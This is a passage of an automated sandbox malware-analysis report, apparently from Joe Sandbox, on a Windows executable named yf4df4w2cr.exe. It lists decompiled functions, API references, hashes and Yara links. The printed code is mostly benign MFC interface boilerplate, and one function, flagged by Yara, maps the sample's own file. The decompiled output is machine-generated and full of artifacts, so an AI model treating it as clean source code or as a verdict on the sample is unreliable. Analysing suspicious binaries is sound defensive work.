                  0x00410b7c
                  0x00410b83
                  0x00410b89
                  0x00410b8d
                  0x00410b91
                  0x00410b99
                  0x00410b9a
                  0x00410b9d
                  0x00410c49
                  0x00410c5b
                  0x00000000
                  0x00410ba3
                  0x00410ba3
                  0x00410ba6
                  0x00410c41
                  0x00410c60
                  0x00410c62
                  0x00000000
                  0x00000000
                  0x00410ba8
                  0x00410ba8
                  0x00410bab
                  0x00410c04
                  0x00410c0c
                  0x00410c1d
                  0x00000000
                  0x00410bad
                  0x00410bb2
                  0x00410c64
                  0x00410c71
                  0x00410c77
                  0x00410bb8
                  0x00410bc9
                  0x00410be6
                  0x00410bee
                  0x00410bee
                  0x00410bb2
                  0x00410bab
                  0x00410ba6
                  0x00410bfb

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
                  • String ID: AfxOldWndProc423
                  • API String ID: 2109165785-1060338832
                  • Opcode ID: f8daf118ba78ef8a89b28ddf675110c5a81804194b7a1092223d3a2c73349c4a
                  • Instruction ID: 7d730690561c9216d8e88f9ae386013ec32041a0da163b1d26ff2b3a16a30a38
                  • Opcode Fuzzy Hash: f8daf118ba78ef8a89b28ddf675110c5a81804194b7a1092223d3a2c73349c4a
                  • Instruction Fuzzy Hash: 2B316D32800219BBCF11AFE6DD4DDFF7A78BF09305F00052AF501B2161DB7999A09BA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004064F0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 426 4064f0-4064ff 427 406505-406546 GetDC GetSystemMetrics CreateFontA 426->427 428 406588-406589 426->428 429 406551-406565 GetCharWidthA 427->429 430 406548-40654e SelectObject 427->430 431 406576-406587 ReleaseDC 429->431 432 406567-406570 SelectObject DeleteObject 429->432 430->429 431->428 432->431
                  C-Code - Quality: 100%
                  			E004064F0(void* __ecx) {
				struct HDC__* _v8;
				void* _v12;
				int _t9;
				int _t15;
				void* _t20;

				_t9 =  *0x462634; // 0xf
				if(_t9 == 0xffffffff) {
					_v8 = GetDC(0);
					_v12 = 0;
					_t20 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t20 != 0) {
						_v12 = SelectObject(_v8, _t20);
					}
					GetCharWidthA(_v8, 0x36, 0x36, 0x462634); // executed
					if(_t20 != 0) {
						SelectObject(_v8, _v12);
						DeleteObject(_t20);
					}
					ReleaseDC(0, _v8);
					_t15 =  *0x462634; // 0xf
					return _t15;
				}
				return _t9;
			}








                  0x004064f7
                  0x004064ff
                  0x00406529
                  0x0040652c
                  0x00406542
                  0x00406546
                  0x0040654e
                  0x0040654e
                  0x0040655d
                  0x00406565
                  0x0040656d
                  0x00406570
                  0x00406570
                  0x0040657a
                  0x00406580
                  0x00000000
                  0x00406587
                  0x00406589

                  APIs
                  • GetDC.USER32(00000000), ref: 0040650B
                  • GetSystemMetrics.USER32 ref: 0040652F
                  • CreateFontA.GDI32(00000000), ref: 00406536
                  • SelectObject.GDI32(?,00000000), ref: 0040654C
                  • GetCharWidthA.GDI32(?,00000036,00000036,00462634), ref: 0040655D
                  • SelectObject.GDI32(?,?), ref: 0040656D
                  • DeleteObject.GDI32(00000000), ref: 00406570
                  • ReleaseDC.USER32 ref: 0040657A
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                  • String ID: Marlett
                  • API String ID: 1397664628-3688754224
                  • Opcode ID: d625e81e30d2d5b5eacfecf79bbbfade7bba1e7911b5c54bb0e160659e22b730
                  • Instruction ID: e81e0d02648677b469a39f7f1f5c13e3aea240fbea2e15458392ef8c70e3ee26
                  • Opcode Fuzzy Hash: d625e81e30d2d5b5eacfecf79bbbfade7bba1e7911b5c54bb0e160659e22b730
                  • Instruction Fuzzy Hash: 2C118E35942224BBD7215BA2ED4EDCFBE2DFF16BA0F510021F109A11A0C6B10E00CBA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042143D, Relevance: 15.1, APIs: 10, Instructions: 97COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 433 42143d-42145e DefWindowProcA 434 421546-421549 433->434 435 421464-42148f GetWindowRect 433->435 436 421491-42149b 435->436 437 4214ed-4214ef 435->437 436->437 438 42149d-4214ea SetRect InvalidateRect SetRect InvalidateRect 436->438 439 4214f1-4214fb 437->439 440 421545 437->440 438->437 439->440 441 4214fd-42153f SetRect InvalidateRect SetRect InvalidateRect 439->441 440->434 441->440
                  C-Code - Quality: 100%
                  			E0042143D(void* __ecx, int _a4) {
				int _v8;
				struct tagRECT _v24;
				long _t39;
				int _t42;
				int _t43;
				int _t62;
				int _t66;
				void* _t68;
				long _t69;
				int _t71;

				_t69 = _a4;
				_t68 = __ecx;
				_t39 = DefWindowProcA( *(__ecx + 0x20), 0x46, 0, _t69); // executed
				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
					GetWindowRect( *(_t68 + 0x20),  &_v24);
					_t42 = _a4;
					_t66 =  *(_t42 + 0x10);
					_t71 = _v24.right - _v24.left;
					_t62 = _v24.bottom - _v24.top;
					_t43 =  *(_t42 + 0x14);
					_v8 = _t66;
					_a4 = _t43;
					if(_t66 != _t71 && ( *(_t68 + 0x84) & 0x00000400) != 0) {
						SetRect( &_v24, _t66 -  *0x466520, 0, _t66, _t43);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						SetRect( &_v24, _t71 -  *0x466520, 0, _t71, _a4);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						_t66 = _v8;
						_t43 = _a4;
					}
					if(_t43 != _t62 && ( *(_t68 + 0x84) & 0x00000800) != 0) {
						SetRect( &_v24, 0, _t43 -  *0x466524, _t66, _t43);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						SetRect( &_v24, 0, _t62 -  *0x466524, _v8, _t62);
						_t43 = InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
					}
					return _t43;
				}
				return _t39;
			}













                  0x00421446
                  0x0042144d
                  0x00421454
                  0x0042145e
                  0x0042146c
                  0x00421472
                  0x00421478
                  0x0042147b
                  0x00421481
                  0x00421484
                  0x00421487
                  0x0042148a
                  0x0042148f
                  0x004214ac
                  0x004214bb
                  0x004214d2
                  0x004214e1
                  0x004214e7
                  0x004214ea
                  0x004214ea
                  0x004214ef
                  0x00421512
                  0x0042151d
                  0x00421534
                  0x0042153f
                  0x0042153f
                  0x00000000
                  0x00421545
                  0x00421549

                  APIs
                  • DefWindowProcA.USER32(?,00000046,00000000,?,?,?), ref: 00421454
                  • GetWindowRect.USER32 ref: 0042146C
                  • SetRect.USER32 ref: 004214AC
                  • InvalidateRect.USER32(?,?,00000001), ref: 004214BB
                  • SetRect.USER32 ref: 004214D2
                  • InvalidateRect.USER32(?,?,00000001), ref: 004214E1
                  • SetRect.USER32 ref: 00421512
                  • InvalidateRect.USER32(?,?,00000001), ref: 0042151D
                  • SetRect.USER32 ref: 00421534
                  • InvalidateRect.USER32(?,?,00000001), ref: 0042153F
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Invalidate$Window$Proc
                  • String ID:
                  • API String ID: 570070710-0
                  • Opcode ID: 600d90e0c36db47e27be2003a9a329f79ea7bd473ed92dd9532af274cc9c2e19
                  • Instruction ID: 67fc1e0d515d65dd7be6bb3fc1ba63dd0bc7bc45e6ac663643d9f47821cdaeb9
                  • Opcode Fuzzy Hash: 600d90e0c36db47e27be2003a9a329f79ea7bd473ed92dd9532af274cc9c2e19
                  • Instruction Fuzzy Hash: 25311A76A00119BFDB14CFA4DD89FAABB7CFB08300F110165FA05A7160D770AA54CBA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023ED0EA, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • CreateFileW.KERNELBASE(C:\Users\user\Desktop\yf4df4w2cr.exe,80000000,00000001,00000000,00000003,00000000,00000000,00000102,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED0FF
                  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED114
                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED126
                  • GetFileSize.KERNEL32(00000000,00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED135
                  • UnmapViewOfFile.KERNEL32(00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED14B
                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED152
                  • CloseHandle.KERNEL32(00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED159
                  Strings
                  • C:\Users\user\Desktop\yf4df4w2cr.exe, xrefs: 023ED0FA
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateView$ChangeFindHandleMappingNotificationSizeUnmap
                  • String ID: C:\Users\user\Desktop\yf4df4w2cr.exe
                  • API String ID: 925460653-4017221262
                  • Opcode ID: 6d53d37a3b8ab5235604d04f88e72700d7ee04948d2994fb249b723993269e8d
                  • Instruction ID: eb1bd7e3ad3cb23053fc57030c957b31abfcccd135afa5c553945f6d7670913f
                  • Opcode Fuzzy Hash: 6d53d37a3b8ab5235604d04f88e72700d7ee04948d2994fb249b723993269e8d
                  • Instruction Fuzzy Hash: 6F0131F2A8021CBFF69516A87CCDF7B366CEB4979AF100415F702912C597A44C264670
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040F201, Relevance: 12.1, APIs: 8, Instructions: 125windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 477 40f201-40f224 478 40f226-40f22d 477->478 479 40f22f-40f236 GetClientRect 477->479 480 40f23c-40f24a 478->480 479->480 481 40f259 480->481 482 40f24c-40f257 BeginDeferWindowPos 480->482 483 40f25d-40f268 GetTopWindow 481->483 482->483 484 40f2ab-40f2af 483->484 485 40f2b1-40f2b5 484->485 486 40f26a-40f27c GetDlgCtrlID call 40ee68 484->486 487 40f2e1-40f2e4 485->487 488 40f2b7-40f2ba 485->488 498 40f283-40f286 486->498 499 40f27e-40f281 486->499 492 40f2e6-40f2e9 487->492 493 40f338-40f33b 487->493 490 40f2cb-40f2df 488->490 491 40f2bc-40f2c9 CopyRect 488->491 495 40f346-40f34a 490->495 491->495 492->493 497 40f2eb-40f2f7 call 40ee3c 492->497 493->495 496 40f33d-40f340 KiUserCallbackDispatcher 493->496 496->495 506 40f313-40f31a 497->506 507 40f2f9-40f310 497->507 501 40f2a2-40f2a5 GetWindow 498->501 502 40f288-40f28b 498->502 499->501 501->484 502->501 503 40f28d-40f28f 502->503 503->501 505 40f291-40f29c SendMessageA 503->505 505->501 506->493 508 40f31c-40f333 call 40cee2 506->508 507->506 508->493
                  C-Code - Quality: 92%
                  			E0040F201(int __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t61;
				int _t62;
				signed int _t64;
				int _t72;
				intOrPtr* _t84;
				struct HWND__* _t90;

				_t72 = __ecx;
				_t74 = _a28;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x20),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				_t61 = _a16 & 0xffff7fff;
				_a24 = _t61;
				if(_t61 == 1) {
					_t13 =  &_v40;
					 *_t13 = _v40 & 0x00000000;
					__eflags =  *_t13;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t62 = GetTopWindow( *(_t72 + 0x20));
				while(1) {
					_t90 = _t62;
					if(_t90 == 0) {
						break;
					}
					_t72 = GetDlgCtrlID(_t90);
					_t64 = E0040EE68(_t74, 0, _t90, __eflags, _t90);
					__eflags = _t72 - _a12;
					if(__eflags != 0) {
						__eflags = _t72 - _a4;
						if(__eflags >= 0) {
							__eflags = _t72 - _a8;
							if(__eflags <= 0) {
								__eflags = _t64;
								if(__eflags != 0) {
									SendMessageA(_t90, 0x361, 0,  &_v40); // executed
								}
							}
						}
					} else {
						_v8 = _t90;
					}
					_t62 = GetWindow(_t90, 2);
				}
				if(_a24 != 1) {
					__eflags = _a12;
					if(_a12 != 0) {
						__eflags = _v8;
						if(_v8 != 0) {
							_t62 = E0040EE3C(_t72, _t74, _v8);
							__eflags = _a24 - 2;
							if(_a24 == 2) {
								_t84 = _a20;
								_v36.left = _v36.left +  *_t84;
								_v36.top = _v36.top +  *((intOrPtr*)(_t84 + 4));
								_v36.right = _v36.right -  *((intOrPtr*)(_t84 + 8));
								_t45 =  &(_v36.bottom);
								 *_t45 = _v36.bottom -  *((intOrPtr*)(_t84 + 0xc));
								__eflags =  *_t45;
							}
							__eflags = _a16 & 0x00008000;
							if((_a16 & 0x00008000) == 0) {
								 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
								_t62 = E0040CEE2( &_v40, _v8,  &_v36);
							}
						}
					}
					__eflags = _v40;
					if(_v40 != 0) {
						_t62 = EndDeferWindowPos(_v40); // executed
					}
				} else {
					if(_a28 == 0) {
						_t62 = _a20;
						 *((intOrPtr*)(_t62 + 8)) = _v20;
						 *((intOrPtr*)(_t62 + 4)) = 0;
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
					} else {
						_t62 = CopyRect(_a20,  &_v36);
					}
				}
				return _t62;
			}


















                  0x0040f210
                  0x0040f212
                  0x0040f216
                  0x0040f219
                  0x0040f21c
                  0x0040f21f
                  0x0040f224
                  0x0040f236
                  0x0040f226
                  0x0040f229
                  0x0040f22a
                  0x0040f22b
                  0x0040f22c
                  0x0040f22c
                  0x0040f23f
                  0x0040f244
                  0x0040f24a
                  0x0040f259
                  0x0040f259
                  0x0040f259
                  0x0040f24c
                  0x0040f254
                  0x0040f254
                  0x0040f260
                  0x0040f2ab
                  0x0040f2ab
                  0x0040f2af
                  0x00000000
                  0x00000000
                  0x0040f272
                  0x0040f274
                  0x0040f279
                  0x0040f27c
                  0x0040f283
                  0x0040f286
                  0x0040f288
                  0x0040f28b
                  0x0040f28d
                  0x0040f28f
                  0x0040f29c
                  0x0040f29c
                  0x0040f28f
                  0x0040f28b
                  0x0040f27e
                  0x0040f27e
                  0x0040f27e
                  0x0040f2a5
                  0x0040f2a5
                  0x0040f2b5
                  0x0040f2e1
                  0x0040f2e4
                  0x0040f2e6
                  0x0040f2e9
                  0x0040f2ee
                  0x0040f2f3
                  0x0040f2f7
                  0x0040f2f9
                  0x0040f2fe
                  0x0040f304
                  0x0040f30a
                  0x0040f310
                  0x0040f310
                  0x0040f310
                  0x0040f310
                  0x0040f313
                  0x0040f31a
                  0x0040f325
                  0x0040f333
                  0x0040f333
                  0x0040f31a
                  0x0040f2e9
                  0x0040f338
                  0x0040f33b
                  0x0040f340
                  0x0040f340
                  0x0040f2b7
                  0x0040f2ba
                  0x0040f2cb
                  0x0040f2d1
                  0x0040f2d7
                  0x0040f2da
                  0x0040f2dc
                  0x0040f2bc
                  0x0040f2c3
                  0x0040f2c3
                  0x0040f2ba
                  0x0040f34a

                  APIs
                  • GetClientRect.USER32 ref: 0040F236
                  • BeginDeferWindowPos.USER32 ref: 0040F24E
                  • GetTopWindow.USER32(00000001), ref: 0040F260
                  • GetDlgCtrlID.USER32 ref: 0040F26B
                  • SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 0040F29C
                  • GetWindow.USER32(00000000,00000002), ref: 0040F2A5
                  • CopyRect.USER32 ref: 0040F2C3
                  • KiUserCallbackDispatcher.NTDLL(00000000,?,00000001), ref: 0040F340
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Rect$BeginCallbackClientCopyCtrlDeferDispatcherMessageSendUser
                  • String ID:
                  • API String ID: 1656430526-0
                  • Opcode ID: 6d2dbe2eeacec313d78451a0fb5afa6627e160b037f6c151f147efc9526f9ac5
                  • Instruction ID: 0940655b8c9f504fb26903620ff38c1a6262de45de23ed48141b808c52172a37
                  • Opcode Fuzzy Hash: 6d2dbe2eeacec313d78451a0fb5afa6627e160b037f6c151f147efc9526f9ac5
                  • Instruction Fuzzy Hash: 6A417B75900209EFCF20DF95C8849EEB7B5FF49314B1441BAE801B7290D7399A45CFA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004203BF, Relevance: 12.0, APIs: 8, Instructions: 39COMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E004203BF(void* __ecx) {
				int _t5;
				struct HDC__* _t15;
				void* _t17;

				_t17 = __ecx; // executed
				_t5 = GetSystemMetrics(0xb); // executed
				 *((intOrPtr*)(_t17 + 8)) = _t5;
				 *((intOrPtr*)(_t17 + 0xc)) = GetSystemMetrics(0xc);
				 *0x466510 = GetSystemMetrics(2) + 1;
				 *0x466514 = GetSystemMetrics(3) + 1;
				_t15 = GetDC(0);
				 *((intOrPtr*)(_t17 + 0x18)) = GetDeviceCaps(_t15, 0x58);
				 *((intOrPtr*)(_t17 + 0x1c)) = GetDeviceCaps(_t15, 0x5a);
				return ReleaseDC(0, _t15);
			}






                  0x004203cc
                  0x004203ce
                  0x004203d2
                  0x004203d9
                  0x004203e1
                  0x004203eb
                  0x004203fc
                  0x00420406
                  0x0042040e
                  0x0042041a

                  APIs
                  • KiUserCallbackDispatcher.NTDLL ref: 004203CE
                  • GetSystemMetrics.USER32 ref: 004203D5
                  • GetSystemMetrics.USER32 ref: 004203DC
                  • GetSystemMetrics.USER32 ref: 004203E6
                  • GetDC.USER32(00000000), ref: 004203F0
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00420401
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00420409
                  • ReleaseDC.USER32 ref: 00420411
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                  • String ID:
                  • API String ID: 1031845853-0
                  • Opcode ID: b9b20a255bf8ec8179fb1d58bd2a46d1a8caece91da757cd9b7519637d2d4eb4
                  • Instruction ID: c70a73cfab10beb5ae40e0ca9f9cf222f8cc2b62db800e03fd6d50582627701f
                  • Opcode Fuzzy Hash: b9b20a255bf8ec8179fb1d58bd2a46d1a8caece91da757cd9b7519637d2d4eb4
                  • Instruction Fuzzy Hash: F2F067B1E40724BAE7105F72AC4AB1A7F68FB41721F014826E6158B280EBB598108FD4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00411F96, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 244COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 512 411f96-411fae call 41f363 515 411fb0-411fb3 512->515 516 411fb8-411ff3 call 431160 call 41f363 512->516 517 412284-412285 515->517 522 412011-412015 516->522 523 411ff5-41200e call 411c95 516->523 525 412035-412039 522->525 526 412017-412030 call 411c95 522->526 523->522 534 412010 523->534 527 41203b-412057 call 411c95 525->527 528 41205c-412060 525->528 526->525 536 412032 526->536 527->528 543 412059 527->543 532 412082-412085 528->532 533 412062-41207d call 411f52 528->533 539 412087-4120aa call 411f52 532->539 540 4120ae-4120b2 532->540 533->532 549 41207f 533->549 534->522 536->525 539->540 555 4120ac 539->555 541 4120d2-4120d6 540->541 542 4120b4-4120cb call 40f52e 540->542 547 4120d8-4120ea call 40f52e 541->547 548 4120ec-4120f0 541->548 542->541 543->528 547->548 553 4120f2-412107 call 40f52e 548->553 554 412109-412111 548->554 549->532 553->554 558 412113-412120 call 40f52e 554->558 559 412122-41212a 554->559 555->540 558->559 560 41212c-41213d call 40f52e 559->560 561 41213f-412147 559->561 560->561 565 412149-41215a call 40f52e 561->565 566 41215c-412164 561->566 565->566 570 412166-412177 call 40f52e 566->570 571 412179-412181 566->571 570->571 574 412183-41218f call 40f52e 571->574 575 412196-41219e 571->575 583 412194 574->583 576 4121a0-4121b1 call 40f52e 575->576 577 4121b3-4121bb 575->577 576->577 581 4121bd-4121ca call 40f52e 577->581 582 4121cc-4121d4 577->582 581->582 586 4121e5-4121ed 582->586 587 4121d6-4121e3 call 40f52e 582->587 583->575 590 412202-41220a 586->590 591 4121ef-412200 call 40f52e 586->591 587->586 592 41220c-41221d call 40f52e 590->592 593 41221f-412227 590->593 591->590 592->593 597 412229-412236 call 40f52e 593->597 598 412238-412240 593->598 597->598 602 412242-412253 call 40f52e 598->602 603 412255-412269 598->603 602->603 606 412274-412283 603->606 607 41226b-412271 603->607 606->517 607->606
                  C-Code - Quality: 94%
                  			E00411F96(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t127;
				void* _t133;
				intOrPtr _t135;
				signed int _t145;
				signed int _t150;
				signed int _t167;
				signed int _t183;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t191;
				signed int _t195;
				void* _t198;
				intOrPtr _t199;
				signed int _t209;

				_t198 = __ecx;
				_t127 = E0041F363(__ebx, __edi, __esi, __eflags);
				_v8 = _t127;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t127 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 0;
				E00431160(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t133 = E0041F363(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t133 + 8));
				_t135 =  *0x466550; // 0x10003
				_t195 = 8;
				_v32 = _t135;
				_v16 = _t195;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd90s";
					_t191 = E00411C95(_t195, _t198, 0, 0, __eflags);
					__eflags = _t191;
					if(_t191 != 0) {
						_t209 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl90s";
					_t189 = E00411C95(_t195, _t198, 0, _t209, __eflags);
					__eflags = _t189;
					if(_t189 != 0) {
						_t209 = _t209 | 0x00000020;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar90s";
					_v28 = 0x10;
					_t187 = E00411C95(_t195, _t198, 0, _t209, __eflags);
					__eflags = _t187;
					if(_t187 != 0) {
						_t209 = _t209 | 0x00000002;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t195;
					_v28 = 0;
					_t185 = E00411F52(_t198, __eflags,  &_v56, "AfxMDIFrame90s", 0x7a01);
					__eflags = _t185;
					if(_t185 != 0) {
						_t209 = _t209 | 0x00000004;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & _t195;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t183 = E00411F52(_t198, __eflags,  &_v56, "AfxFrameOrView90s", 0x7a02);
					__eflags = _t183;
					if(_t183 != 0) {
						_t209 = _t209 | _t195;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x40);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x80);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t195;
					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x100);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x200);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x400);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x800);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t167 = E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x1000); // executed
					_t209 = _t209 | _t167;
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x2000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x4000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x8000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x10000);
					__eflags = _t209;
				}
